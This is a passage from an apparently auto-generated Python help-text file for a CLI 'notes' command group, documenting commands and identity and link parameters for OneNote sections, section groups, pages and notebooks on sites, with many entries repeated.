may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for sites" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for sites" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from sites" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from sites" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from sites" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSection for sites" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section'] = """ type: command short-summary: "Get parentSection from sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section'] = """ type: command short-summary: "Update the navigation property parentSection in sites" """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for sites" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for sites" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from sites" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from sites" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from sites" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSection for sites" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section'] = """ type: command short-summary: "Get parentSection from sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section'] = """ type: command short-summary: "Update the navigation property parentSection in sites" """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for sites" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for sites" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from sites" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from sites" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from sites" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: 